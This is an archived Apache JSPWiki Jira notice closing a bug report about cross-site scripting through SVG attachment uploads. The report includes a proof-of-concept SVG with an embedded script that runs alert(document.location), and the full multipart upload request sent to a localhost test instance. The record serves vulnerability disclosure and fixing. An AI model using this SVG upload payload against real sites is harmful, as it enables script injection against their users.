You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@jspwiki.apache.org by "Juan Pablo Santos Rodríguez (Jira)" <ji...@apache.org> on 2021/09/23 09:26:00 UTC

[jira] [Closed] (JSPWIKI-1139) XSS via upload attachment

     [ https://issues.apache.org/jira/browse/JSPWIKI-1139?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Juan Pablo Santos Rodríguez closed JSPWIKI-1139.
------------------------------------------------

> XSS via upload attachment
> -------------------------
>
>                 Key: JSPWIKI-1139
>                 URL: https://issues.apache.org/jira/browse/JSPWIKI-1139
>             Project: JSPWiki
>          Issue Type: Bug
>          Components: Core &amp; storage
>         Environment: Windows new version
> Firefox version 84.0.1
>            Reporter: Nguyen Dang Khai
>            Priority: Major
>             Fix For: 2.11.0-M4
>
>         Attachments: wiki.mp4
>
>
> * Summary :
> XSS exists via upload file.Upload file svg to trigger javascript
>  * Step to produce:
> 1. Create svg file with contain:
> {code:java}
> // <?xml version="1.0" standalone="no"?>
> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
>    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
>    <script type="text/javascript">
>       alert(document.location);
>    </script>
> </svg>
> {code}
> 2. Inurl : [http://localhost:8081/wiki_jsp_war/Upload.jsp?page=LeftMenuFooter] . Upload file svg.
> {code:java}
> POST /wiki_jsp_war/attach?progressid=be2d8a23-26ca-4652-ad43-ba7983bf2aa8 HTTP/1.1
> Host: localhost:8081
> ...
> -----------------------------308155045040371725912594659801
> Content-Disposition: form-data; name="nextpage"/wiki_jsp_war/Upload.jsp?page=LeftMenuFooter
> -----------------------------308155045040371725912594659801
> Content-Disposition: form-data; name="page"LeftMenuFooter
> -----------------------------308155045040371725912594659801
> Content-Disposition: form-data; name="action"upload
> -----------------------------308155045040371725912594659801
> Content-Disposition: form-data; name="kj2ztmbp"; filename="SVG_XSS.svg"
> Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?>
> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
>    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
>    <script type="text/javascript">
>       alert(document.location);
>    </script>
> </svg>
> -----------------------------308155045040371725912594659801
> Content-Disposition: form-data; name="changenote"
> -----------------------------308155045040371725912594659801
> Content-Disposition: form-data; name="upload"Upload
> -----------------------------308155045040371725912594659801--
> {code}
> 3. Open file svg and execute malicious javascript.



--
This message was sent by Atlassian Jira
(v8.3.4#803005)